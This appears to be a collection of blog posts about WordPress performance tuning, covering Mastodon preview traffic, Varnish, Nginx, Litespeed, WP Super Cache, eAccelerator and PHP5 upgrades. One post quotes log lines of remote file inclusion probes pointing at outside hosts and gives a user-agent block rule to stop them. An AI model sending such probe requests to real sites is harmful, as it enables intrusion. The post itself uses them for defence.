You might not be on Mastodon yet, but your blog could get a torrent of traffic from Mastodon, or another Fediverse network, if it’s shared there.
If your website is mentioned there, it might be the “victim” of an inadvertent denial of service attack, as hundreds or thousands of servers request the URL in the 60 seconds or so afterwards. That is precisely what JWZ blogged about last month when his site was taken down by Mastodon servers.
“Every time I do a new blog post, within a second I have over a thousand simultaneous hits of that URL on my web server from unique IPs. Load goes over 100, and mariadb stops responding.”
JWZ has over 8,000 followers. Every time he shares a post on Mastodon, the instances (servers) where those followers live will send a request to his blog to generate a preview. Actually, two requests will be sent:
A request for the wp-json embed for the page.
A request for the page that was shared.
Eventually, he blocked the Mastodon user agent. That stops previews of his website from showing up in Mastodon posts, but it resolves the problem for his server.
Yesterday morning, I decided to see what effect sharing a link on my Mastodon account would have on my server. My Mastodon account has 1.8K followers. A far cry from the number of followers JWZ has, but still enough to test my server.
I wanted to test several scenarios:
Caching the post before sharing.
Changing Apache configuration.
Sharing without caching on my server.
My server is at Linode. I pay an average of $24/month to run this site, and my photoblog, where I share a daily photo and link on Mastodon, is on it too. It’s not a heavy-duty server that can withstand a huge amount of traffic.
If you’d like to skip the details: my server coped fine with sharing a URL from here to Mastodon. The load average went up for about 20 seconds, topping out at the maximum for about 5 seconds before things calmed down. The server was responsive the whole time. Install a full-page caching plugin like WP Super Cache, along with Jetpack Boost and WP Rest Cache, and your site will probably be fine. Jetpack Boost and the Jetpack Image Accelerator will help when human visitors arrive.
1 minute load average topped out at 1.34 for 5 seconds.
The page was cached by WP Super Cache, but I had set the garbage collection TTL to 60 seconds and I believe it expired halfway through the test, so it had to generate the cache again. Once I adjusted that, and set the TTL to 600 seconds, the second test performed better. The page remained cached throughout:
273 requests for the page embed.
289 requests for the page itself.
1 minute load average topped out at 0.71 for 5 seconds.
The main points of my Apache configuration (sketched in the config excerpt after this list):
Keep alives are disabled.
5 start servers
Minimum 10 spare servers
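For illustration, those settings correspond to something like the following in an Apache prefork configuration. This is a sketch, not my actual config file; the directive names are standard Apache ones, but the file they live in (apache2.conf or mpm_prefork.conf) depends on your distribution.

# Disable keep-alives and keep spare children ready for traffic spikes.
KeepAlive Off

<IfModule mpm_prefork_module>
    StartServers      5
    MinSpareServers  10
</IfModule>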
When I reduced the start and minimum spare servers to 1, the next test took longer to complete, and the load average rose to 1.24, even on a fully cached page. This was expected as the server didn’t have the spare capacity to deal with the sudden traffic.
After reverting the changes to Apache, I disabled caching on my blog and shared another URL. The load average only rose to 1.12 for a very short time. I was pleased with that. While caching does help, my server could cope with that traffic.
[Screenshot: a sample of the user agents used by Mastodon instances hitting my blog for previews.]
I suspected that there was one hit per Mastodon instance on my site. I checked my logs and was proved right. For all the accounts that follow me on mastodon.social, only one request was made. That does mean the onslaught of requests isn’t as bad as it might be. Instead of 1,800 requests for a page, there were far fewer. I did notice that a Friendica instance requested one of my test URLs several times.
Mastodon and other Fediverse servers will start requesting a preview within a second of you sharing your post on the network. It helps if your server is running some sort of caching.
If you have many Mastodon followers or if you’re worried about a DDoS from Mastodon, the following will help:
Make sure Apache/Nginx has the spare capacity to grow quickly and respond to a sudden torrent of requests.
Use “expert caching” in WP Super Cache, which serves the cached page using mod_rewrite. That will mean your blog post is served almost as fast as requesting a text file from the server. No PHP is executed at all. (See the sketch after this list.)
Install WP Rest Cache as it will cache the embed (wp-json) request.
Install Jetpack and enable the Image Accelerator and Jetpack Boost for human visitors who come later.
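For context, WP Super Cache’s expert mode writes mod_rewrite rules into your .htaccess. The rules below are a rough sketch of the idea, not the exact rules the plugin generates (those vary with your settings): serve the supercache file directly when it exists and the visitor has no WordPress cookies.

# Sketch only: serve the static supercache copy of a page when one exists.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} ^$
RewriteCond %{HTTP_COOKIE} !(comment_author_|wordpress_logged_in|wp-postpass_) [NC]
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html -f
RewriteRule ^(.*)$ /wp-content/cache/supercache/%{HTTP_HOST}/$1/index.html [L]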
This problem has existed for a long time. Popular blogs had the same issue when they published new content and people following their blogs (through RSS feed readers, remember them?) hit the server looking for the new post. At least with Mastodon, you can load the post in a private browser window and cache it before sharing it. I want to write a WP Super Cache add-on plugin that allows the site owner to preload a new post as it’s published. That will ensure the new content is ready for sharing. I haven’t started work on that yet, so don’t ask when it’ll be done. Maybe someone else will beat me to it and claim all the credit!
Varnish is an open source, state of the art web application accelerator.
What it does is make your existing site faster by caching requests so your web server doesn’t have to handle them. This helps because your web server may be a lumbering giant like Apache that is loaded up with extra functionality like PHP, the GD library, mod_rewrite and all the other tools you need to make your website. All these modules unfortunately make your general purpose web server slower and heavier so by avoiding it your site spits out pages much faster!
Varnish sits in front of your webserver. Most documentation I’ve read on the subject suggests having Apache listen on any port other than port 80 and then having Varnish listen on port 80 of the external IP address. There’s no need for an unusual port: I configured Apache to listen on port 80 of the 127.0.0.1 (localhost) address while Varnish sits on the external IP.
Installing Varnish
Setting up Varnish is fairly easy. I’m going to assume that you’re already using Apache. On a Debian-based system, just use this to install it (as root):
apt-get install varnish
Apache
You need to configure Apache first. It has to listen on port 80 of the localhost interface. Edit /etc/apache2/ports.conf and change the following settings:
NameVirtualHost 127.0.0.1:80
Listen 127.0.0.1:80
Normally Apache listens on port 80 of all interfaces so you’ll probably just have to add “127.0.0.1:” in front of the 80.
Varnish
By default Varnish won’t start. You need to edit /etc/default/varnish. Change the following options in that file:
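The options themselves are missing from this copy of the post. On a Debian package of that era they looked roughly like this (a sketch; exact option names vary between package versions, and the cache size and paths are examples):

# /etc/default/varnish: start Varnish at boot, listen on port 80,
# load our VCL and use a 1GB file-backed cache.
START=yes
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -s file,/var/lib/varnish/varnish_storage.bin,1G"

The VCL file it loads, /etc/varnish/default.vcl, needs a backend definition pointing at Apache; again, a sketch:

# The backend Varnish proxies to: Apache on the localhost interface.
backend default {
    .host = "127.0.0.1";
    .port = "80";
}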
This tells Varnish that Apache is listening on port 80 of the localhost interface.
I’m going to define several functions in the default.vcl now. Comments in the code should explain what most of it does.
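One top-level declaration is assumed by the code below but not shown in the original listing: the PURGE handler in vcl_recv checks client IPs against an ACL named “purge”. A minimal sketch:

# Hosts allowed to issue PURGE requests; localhost only in this sketch.
acl purge {
    "127.0.0.1";
}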
# Called after a document has been successfully retrieved from the backend.
sub vcl_fetch {
    # Uncomment to set the default cache "time to live" to 5 minutes. Handy,
    # but it may cache stale pages unless purged. (TODO)
    # By default Varnish will use the headers sent to it by Apache (the backend
    # server) to figure out the correct TTL.
    # WP Super Cache sends a TTL of 3 seconds, set in wp-content/cache/.htaccess
    # set beresp.ttl = 300s;

    # Strip cookies for static files and set a long cache expiry time.
    if (req.url ~ "\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|pdf|txt|tar|wav|bmp|rtf|js|flv|swf|html|htm)$") {
        unset beresp.http.set-cookie;
        set beresp.ttl = 24h;
    }

    # If WordPress cookies are found then the page is not cacheable.
    if (req.http.Cookie ~ "(wp-postpass|wordpress_logged_in|comment_author_)") {
        set beresp.cacheable = false;
    } else {
        set beresp.cacheable = true;
    }

    if (!beresp.cacheable) {
        # Varnish determined the object was not cacheable.
        set beresp.http.X-Cacheable = "NO:Not Cacheable";
    } else if (req.http.Cookie ~ "(wp-postpass|wordpress_logged_in|comment_author_)") {
        # You don't wish to cache content for logged in users.
        set beresp.http.X-Cacheable = "NO:Got Session";
        return(pass);
    } else if (beresp.http.Cache-Control ~ "private") {
        # You are respecting the Cache-Control=private header from the backend.
        set beresp.http.X-Cacheable = "NO:Cache-Control=private";
        return(pass);
    } else if (beresp.ttl < 1s) {
        # You are extending the lifetime of the object artificially.
        set beresp.ttl = 300s;
        set beresp.grace = 300s;
        set beresp.http.X-Cacheable = "YES:Forced";
    } else {
        # Varnish determined the object was cacheable.
        set beresp.http.X-Cacheable = "YES";
    }

    # Don't cache 404s or server errors.
    if (beresp.status == 404 || beresp.status >= 500) {
        set beresp.ttl = 0s;
    }

    # Deliver the content.
    return(deliver);
}
sub vcl_hash {
    # Each cached page has to be identified by a key that unlocks it.
    # Add the browser cookie only if a WordPress cookie is found.
    if (req.http.Cookie ~ "(wp-postpass|wordpress_logged_in|comment_author_)") {
        set req.hash += req.http.Cookie;
    }
}
# Deliver
sub vcl_deliver {
    # Uncomment these lines to remove these headers once you've finished
    # setting up Varnish.
    #remove resp.http.X-Varnish;
    #remove resp.http.Via;
    #remove resp.http.Age;
    #remove resp.http.X-Powered-By;
}
# vcl_recv is called whenever a request is received.
sub vcl_recv {
    # Remove ?ver=xxxxx strings from urls so css and js files are cached.
    # Watch out when upgrading WordPress: you need to restart Varnish or
    # flush the cache.
    set req.url = regsub(req.url, "\?ver=.*$", "");

    # Remove "replytocom" from requests to make caching better.
    set req.url = regsub(req.url, "\?replytocom=.*$", "");

    # Record the real client IP for the backend.
    remove req.http.X-Forwarded-For;
    set req.http.X-Forwarded-For = client.ip;

    # Exclude this site because it breaks if cached.
    #if ( req.http.host == "example.com" ) {
    #    return( pass );
    #}

    # Serve objects up to 2 minutes past their expiry if the backend is
    # slow to respond.
    set req.grace = 120s;

    # Strip cookies for static files:
    if (req.url ~ "\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|pdf|txt|tar|wav|bmp|rtf|js|flv|swf|html|htm)$") {
        unset req.http.Cookie;
        return(lookup);
    }

    # Remove has_js and Google Analytics __* cookies.
    set req.http.Cookie = regsuball(req.http.Cookie, "(^|;\s*)(__[a-z]+|has_js)=[^;]*", "");
    # Remove a ";" prefix, if present.
    set req.http.Cookie = regsub(req.http.Cookie, "^;\s*", "");
    # Remove empty cookies.
    if (req.http.Cookie ~ "^\s*$") {
        unset req.http.Cookie;
    }

    # Allow cache purging from trusted IPs only (see the "purge" acl above).
    if (req.request == "PURGE") {
        if (!client.ip ~ purge) {
            error 405 "Not allowed.";
        }
        purge("req.url ~ " req.url " && req.http.host == " req.http.host);
        error 200 "Purged.";
    }

    # Pass anything other than GET and HEAD directly.
    if (req.request != "GET" && req.request != "HEAD") {
        return( pass );
    } /* We only deal with GET and HEAD by default */

    # Remove the Cookies for Comments cookie to make caching better.
    # (The long string below is the site-specific hash used as the cookie name.)
    set req.http.cookie = regsub(req.http.cookie, "1231111111111111122222222333333=[^;]+(; )?", "");

    # Never cache the admin pages, or the server-status page.
    if (req.request == "GET" && (req.url ~ "(wp-admin|bb-admin|server-status)")) {
        return(pipe);
    }

    # Don't cache authenticated sessions.
    if (req.http.Cookie && req.http.Cookie ~ "(wordpress_|PHPSESSID)") {
        return(pass);
    }

    # Don't cache ajax requests.
    if (req.http.X-Requested-With == "XMLHttpRequest" || req.url ~ "nocache" || req.url ~ "(control.php|wp-comments-post.php|wp-login.php|bb-login.php|bb-reset-password.php|register.php)") {
        return (pass);
    }

    return( lookup );
}
Notes:
Varnish now caches Javascript and CSS files without the ?ver=xxxx cache-buster parameter. Varnish doesn’t cache any URL with a GET parameter, so those files weren’t getting cached at all before.
The code removes the Cookies for Comments cookie after it checks for GET and HEAD requests. This improved caching significantly: pages are no longer cached both with and without that cookie, they are all cached without it. The cache hit/miss ratio went up significantly when I made these two changes.
I have a private site on this server that requires login. I had to stop Varnish caching this site as the privacy plugin thought I wasn’t logged in. See the example.com code above.
If pages were purged when they changed, Varnish could store cached pages for much longer.
As I didn’t modify WordPress to issue PURGE commands, the cache probably keeps slightly stale pages around at times, but I haven’t seen it happen or received complaints about it.
PHP
Since all requests to Apache come from the local server, PHP will think that the remote host is the local server. By using an auto_prepend_file set in your php.ini or .htaccess file, you can tell PHP what the real IP is with code like this:
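(The original snippet isn’t shown in this copy of the post; this is a sketch of the usual approach.)

<?php
// Sketch of the prepend file: Varnish records the client IP in
// X-Forwarded-For (see vcl_recv above), so copy it into REMOTE_ADDR
// where WordPress and its plugins expect to find it.
if ( isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}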
You’ll see a huge improvement if you use Apache, especially if you don’t use a full page caching plugin like WP Super Cache on your WordPress site.
To see exactly how well Varnish is working, use varnishstat and watch the ratio of cache hits to misses. This will vary depending on your TTL and on how much time Varnish has had to populate the cache. You can also configure logging using varnishncsa:
varnishncsa -a -w /var/log/varnish/access.log -D -P /var/run/varnishncsa.pid
Now use multitail to watch /var/log/varnish/access.log and your web server’s access log.
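For example (the log paths here are assumptions; use your own):

multitail /var/log/varnish/access.log /var/log/apache2/access.log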
I used a number of sites for help when setting this up.
I have tried Nginx in the past but could not get it working without causing huge CPU spikes as PHP went a little mad. In comparison, Varnish was simple to install and set up. Have you tried Varnish yet? How can I improve the code above?
Edit: It looks like someone else has done the hard work. I must give the WordPress Varnish plugin a go.
This plugin purges your varnish cache when content is added or edited. This includes when a new post is added, a post is updated or when a comment is posted to your blog.
So I finally got a chance to try mod_pagespeed on this server. I particularly wanted to know if it behaved well with WP Super Cache as I’d read reports that it causes problems.
Unfortunately those problems are real but I’ve been told that a new release will be out shortly to address a few bugs so perhaps this will help.
If you’d like to try mod_pagespeed make sure you disable compression in WP Super Cache and clear the cache first. Even though the docs state that the module always generates uncompressed HTML it appears to do the opposite. In fact, it tries to load mod_deflate:
# more pagespeed.load
LoadModule pagespeed_module /usr/lib/apache2/modules/mod_pagespeed.so
# Only attempt to load mod_deflate if it hasn’t been loaded already.
<IfModule !mod_deflate.c>
LoadModule deflate_module /usr/lib/apache2/modules/mod_deflate.so
</IfModule>
When things were working, supercached files were processed by mod_pagespeed correctly. I noticed inline Javascript was modified to remove whitespace, and I presume other changes were made too, but I already minify things and serve static files from another domain, so perhaps the changes made to my pages are minimal.
The changes made by mod_pagespeed, like minifying inline Javascript, are not cached by WP Super Cache so your server has to make these changes each time a page is served. I know that mod_deflate does not cache the gzipped page content, but zips up the page each time it’s served. Mod_pagespeed does however provide a caching mechanism so there’s a good chance those changes are cached there. I haven’t looked at the code so I don’t know.
I did have problems with dynamic pages. A simple phpinfo() quite often refused to load, and backend requests sometimes became stuck. Load on the server skyrocketed occasionally, usually when the module cache directory was emptied.
For now I’ve turned mod_pagespeed off, but that might change as this is a young project that is maturing fast! I’ll update this post when that happens.
I wanted to know what IP addresses were hitting my website. I’d done this before and it only took a moment or two to recreate the commands. Still, here they are for future reference.
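(The commands themselves are missing from this copy of the post; this is a sketch of the usual approach, assuming a combined-format Apache access log.)

# Count requests per client IP, busiest first (top 20).
awk '{ print $1 }' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -20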
If you host your own WordPress blog, it’s probably on Apache. That’s all fine and good. For most sites Apache works wonderfully, especially as it’s so easy to find information on it, on mod_rewrite, and on everything else that everyone else uses.
One of the alternatives is Nginx, a really fast webserver that streaks ahead of Apache in terms of performance, but isn’t quite as easy to use. That’s partly because Apache is the default webserver on most Linux distributions and hosts. Want to try Nginx? Here’s how.
Install Nginx. On Debian based systems that’s as easy as
aptitude install nginx
Nginx doesn’t talk PHP out of the box, but one way to do it is via spawn-fcgi. Here’s where it gets complicated.
Install php5-cgi. Again, on Debian systems, that’s
aptitude install php5-cgi
Edit /etc/nginx/sites-available/default and add the following chunk of code to the “server” section:
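The chunk itself is missing from this copy of the post, but it is presumably the PHP location block that also appears in the full configuration further down; a sketch, using Debian’s default document root:

# Pass PHP requests to the spawn-fcgi/php5-cgi process set up below.
location ~ \.php$ {
    include /etc/nginx/fastcgi_params;
    fastcgi_pass 127.0.0.1:9000;
    fastcgi_index index.php;
    fastcgi_param SCRIPT_FILENAME /var/www/nginx-default$fastcgi_script_name;
}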
You’ll probably get an error at the end of the install if Apache is already running on port 80. (On older Debian systems spawn-fcgi shipped as part of the lighttpd package, so installing it pulls in lighttpd, which tries to start on port 80.) Edit /etc/lighttpd/lighttpd.conf and uncomment the line
server.port = 80
and change 80 to 81. Now run the apt-get command again and it will install.
/etc/init.d/lighttpd stop
will stop lighttpd running. (You don’t need it)
Create a new text file, /usr/bin/php-fastcgi with this:
#!/bin/sh
/usr/bin/spawn-fcgi -a 127.0.0.1 -p 9000 -u nobody -f /usr/bin/php5-cgi
The user “nobody” should match the user Apache runs as to make things easier to transition.
Make it executable with
chmod 755 /usr/bin/php-fastcgi
Create another new file /etc/init.d/init-fastcgi and make it executable with the chmod command too. Put this in the file:
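(The init script itself is missing from this copy of the post; here is a minimal sketch of such a wrapper. The stop action assumes php5-cgi is only used by this setup.)

#!/bin/sh
# Minimal init script sketch for the spawn-fcgi wrapper above.
case "$1" in
  start)
        /usr/bin/php-fastcgi
        ;;
  stop)
        killall -q php5-cgi
        ;;
  restart)
        killall -q php5-cgi
        /usr/bin/php-fastcgi
        ;;
  *)
        echo "Usage: $0 {start|stop|restart}"
        exit 1
        ;;
esac
exit 0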
That’s the PHP part of things. In Debian, the default root is “/var/www/nginx-default” so put an index.php in there to test things out. Stop Apache and start Nginx (if this is a test server only!) and visit your site. Works? Now to get WordPress and WP Super Cache working.
Open up /etc/nginx/sites-enabled/default in your editor and comment out the text already there with # characters. Paste the following in. Change paths and domains to suit your site. (via)
server {
    server_name example.com www.example.com;
    listen 80;
    error_log /www/logs/example.com-error.log;
    access_log /www/logs/example.com-access.log;

    location ~ \.php$ {
        include /etc/nginx/fastcgi_params;
        fastcgi_pass 127.0.0.1:9000;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME /www/example.com/htdocs$fastcgi_script_name;
    }

    location / {
        gzip on;
        gzip_http_version 1.0;
        gzip_vary on;
        gzip_comp_level 3;
        gzip_proxied any;
        gzip_types text/plain text/html text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript;
        gzip_buffers 16 8k;

        root /www/example.com/htdocs;
        index index.php index.html index.htm;

        # if the requested file exists, return it immediately
        if (-f $request_filename) {
            break;
        }

        set $supercache_file '';
        set $supercache_uri $request_uri;

        # never serve a cached page for POST requests
        if ($request_method = POST) {
            set $supercache_uri '';
        }

        # Using pretty permalinks, so bypass the cache for any query string
        if ($query_string) {
            set $supercache_uri '';
        }

        # bypass the cache for logged-in users and commenters
        if ($http_cookie ~* "comment_author_|wordpress|wp-postpass_") {
            set $supercache_uri '';
        }

        # if we haven't bypassed the cache, specify our supercache file
        if ($supercache_uri ~ ^(.+)$) {
            set $supercache_file /wp-content/cache/supercache/$http_host/$1index.html;
        }

        # only rewrite to the supercache file if it actually exists
        if (-f $document_root$supercache_file) {
            rewrite ^(.*)$ $supercache_file break;
        }

        # all other requests go to WordPress
        if (!-e $request_filename) {
            rewrite . /index.php last;
        }
    }
}
I think the gzip settings above will compress cached files if necessary, but Nginx can also use the already-gzipped Supercache files. The Nginx package in the version of Debian I use doesn’t have static gzip support compiled in, but if yours does, take a look at the gzip_static directive. Thanks sivel.
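If your build has the module, it’s a single directive inside the location / block; a sketch:

# Serve a pre-compressed file.gz next to the original when the client
# accepts gzip. Requires Nginx built with http_gzip_static_module.
gzip_static on;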
Finally, edit /etc/nginx/nginx.conf and make sure the user in the following line matches the user above:
user www-data;
I changed it to “nobody nogroup”.
Now, stop Apache and start Nginx:
/etc/init.d/apache2 stop; /etc/init.d/nginx start
WP Super Cache will complain about mod_rewrite missing, and you should disable mobile support.
How has it worked out? I only switched on Friday. The server did do more traffic than normal, but I put that down to the floods in Cork. Weekend traffic was perfectly normal.
Load on the site is slightly higher, probably because my anti-bot mod_rewrite rules aren’t working now. Pingdom stats for the site haven’t changed drastically, and I think the Minify plugin stopped working; I must debug that this week. Switching web servers is a huge task. I disabled mobile support in Supercache because I need to translate those rules to Nginx ones. A little birdie told me that he’s going to write a blog post on this very subject soon. Here’s hoping he’ll put fingers to keys soon.
Have you switched to Nginx? How has your switch worked out for you?
Was it realistic? Even a digg that sends you, say, 8,000 page views in an hour isn’t going to exercise your server that much unless your page is chock full of graphics, CSS and Javascript. (Oh wait, web 2.0…)
So, Litespeed’s webserver is the one to go for? Maybe not. I can’t for the life of me get compression of the static cache working: when I do, the browser tries to display the gzipped data directly. I can enable the webserver’s gzip function, but from my tests I don’t think it caches the resulting gzipped file. (By the way, mod_deflate, the Apache 2 module that does the same thing, suffers from this problem too!) Later: testing this again, Litespeed allows you to set a gzip cache directory. For normal traffic it’s worth doing so pages load faster.
The mod_gzip site is a great resource if you want to find out more about compressing HTTP content.
How did Apache cope? I was serving 100 concurrent requests and Apache didn’t cope too well. It did serve all the file requests eventually, but the load average jumped to just over 50 and the site was unavailable to anyone else. It’ll serve 1,000 requests for a static file fine, even 10,000, but under constant load the server starts to wilt. Unless you have the RAM to keep enough Apache child processes going all the time, you’re going to start swapping.
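(The post doesn’t say which tool generated the load; ApacheBench is one way to run this kind of test, with a placeholder URL here.)

# 10,000 requests, 100 at a time, against a single page.
ab -n 10000 -c 100 http://example.com/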
Meanwhile, Litespeed hardly caused a blip in the server’s load average. I’m quite impressed and I’m running it now. It’s also what powers WordPress.com. Even if you’re not using WordPress, you should look at alternatives to Apache.
This leads me nicely on to announce WP Super Cache 0.4! Download it here!
Major new features include:
A “lock down” button. I like to think of this as my “Digg Proof” button. This basically prepares your site for a heavy digging or slashdotting. It locks down the static cache files and doesn’t delete them when a new comment is made.
Automatic updating of your .htaccess file. (Backup your .htaccess before installing the plugin!)
Don’t super cache any request with GET parameters. You really need to use fancy permalinks now.
WordPress search works again.
Better version checking of wp-cache-config.php and advanced-cache.php in case you’re using an old one.
Better support for Microsoft Windows.
Properly serve cached static files on Red Hat/Cent OS systems or others that have an entry for gzip in /etc/mime.types.
The Reject URI function works again and now uses regular expressions!
Support queries should go to the forum. Make sure your posts are tagged “wp-super-cache”; if you post from that link they will be.
If you look through your server logs you’ll probably notice more than a few requests like these:
GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805”
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805”
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805”
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579”
If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.
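(The rules themselves are missing from this copy of the post; this is a sketch of the kind of rule described, blocking any request whose user agent contains libwww-perl.)

# Deny requests from the libwww-perl user agent.
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC]
RewriteRule .* - [F,L]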
Change “RewriteBase /” to suit your own base directory.
There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.
This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!
PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!
While looking through this WordPress performance post I realised that eAccelerator might not be running properly on this blog. For some time I’ve noticed this site hasn’t been as quick off the mark as it used to be. Dare I say it, but it was even a little sluggish!
If you’re not familiar with it, eAccelerator is a PHP accelerator. It caches PHP bytecode and performs optimizations to make your PHP site run a lot faster.
I verified that eAccelerator was loaded and then checked my php.ini configuration. Sure enough, the eaccelerator.cache_dir directive was set to “/tmp/eacc/” and that directory was deleted the last time my server rebooted.
A permanent fix is to change the location of the cache dir. Put it anywhere the webserver can write to, but don’t put it in /tmp/.
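For example, in php.ini (the path is an example, not from the original post):

; Move the eAccelerator cache out of /tmp so it survives reboots.
eaccelerator.cache_dir = "/var/cache/eaccelerator"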
While you’re looking at eAccelerator, upgrade to the latest version, especially if you’re running PHP5.
I upgraded one of my servers to PHP5 this morning. Two things to watch out for:
The location of your php.ini may have changed. It’s probably now in /etc/php5/apache2/. You need to copy over any changes from your old one.
Update your libraries too, such as the mysql client and the gd library. Don’t forget you can delete the old ones: apt-get install php5-mysql php5-gd will do the job of installing, and the old packages have a php4 prefix.
WP-Cache doesn’t like PHP5 much. If you see a blank page after upgrading to PHP5, and then it loads when you hit reload, WP-Cache needs to be modified. Leroy has the fix: open wp-cache-phase2.php in your wp-cache folder and change ob_end_clean() to ob_end_flush(). Simple as that!
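That is, in wp-cache-phase2.php:

// Before: discards the output buffer, which can produce a blank page on PHP5.
ob_end_clean();
// After: flush the buffered page to the browser instead.
ob_end_flush();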
The reason for the upgrade? I wanted to install the gd extension, but after lots of fun upgrading everything my browser tried to download every page, complaining that it was a phtml file. I chose the upgrade to PHP5 to fix it!
And finally, the reason for gd, was to get the heatmap in this wordpress click tracking plugin working. It’s like Crazy Egg and it works well, but I couldn’t get it to display a heatmap for any page other than the front page. Some of the comments on Daily Blog Tips where I found it are hilarious. They completely miss the point of using a heatmap!